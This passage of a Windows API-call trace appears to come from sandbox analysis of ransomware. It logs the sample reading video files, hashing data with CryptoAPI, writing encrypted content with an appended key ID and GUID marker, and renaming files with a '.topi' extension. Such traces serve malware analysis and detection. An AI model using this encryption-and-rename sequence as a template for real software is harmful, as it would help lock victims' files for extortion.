[0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.763] GetCurrentThreadId () returned 0x8c4 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6c40 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.763] GetCurrentThreadId () returned 0x8c4 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.764] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3uyQN.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\3uyqn.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\3uyQN.mp4.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\3uyqn.mp4.topi")) returned 1 [0095.765] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\desktop.ini") returned=".ini" [0095.765] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GtTSym_ -.flv") returned=".flv" [0095.765] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GtTSym_ -.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gttsym_ -.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.765] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=21452) returned 1 [0095.765] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.768] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x53a6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.768] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.769] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.769] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df228) returned 1 [0095.770] CryptCreateHash (in: hProv=0x6df228, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.770] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.770] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.770] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.770] GetLastError () returned 0x0 [0095.770] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.770] CryptReleaseContext (hProv=0x6df228, dwFlags=0x0) returned 1 [0095.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.770] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.770] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.770] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.770] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.770] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x53d0) returned 0x99f72d8 [0095.771] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2148 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9630 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f2190 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9648 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.771] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0095.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9690 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9678 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.772] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.773] GetCurrentThreadId () returned 0x8c4 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f6cd0 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df228 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.774] GetCurrentThreadId () returned 0x8c4 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9690 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9660 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d96a8 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8eb0 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9f8 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9678 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9678 | out: hHeap=0x680000) returned 1 [0095.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.777] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df228 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9528 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d96a8 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9690 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9660 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9648 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f2190 | out: hHeap=0x680000) returned 1 [0095.777] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb568 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.778] WriteFile (in: hFile=0x6a8, lpBuffer=0x99f72d8*, nNumberOfBytesToWrite=0x53c7, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x99f72d8*, lpNumberOfBytesWritten=0x9ccfb14*=0x53c7, lpOverlapped=0x0) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f72d8 | out: hHeap=0x680000) returned 1 [0095.778] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x53cc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.778] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.778] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316dcb8 [0095.778] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.779] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316dcb8 | out: hHeap=0x680000) returned 1 [0095.779] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.779] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.779] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.779] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.779] CloseHandle (hObject=0x6a8) returned 1 [0095.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.787] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.787] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.787] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GtTSym_ -.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gttsym_ -.flv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\GtTSym_ -.flv.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\gttsym_ -.flv.topi")) returned 1 [0095.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.802] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.802] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.803] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cab80 | out: hHeap=0x680000) returned 1 [0095.804] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x357573f0, ftCreationTime.dwHighDateTime=0x1d5be3d, ftLastAccessTime.dwLowDateTime=0x30c589f0, ftLastAccessTime.dwHighDateTime=0x1d5ba2b, 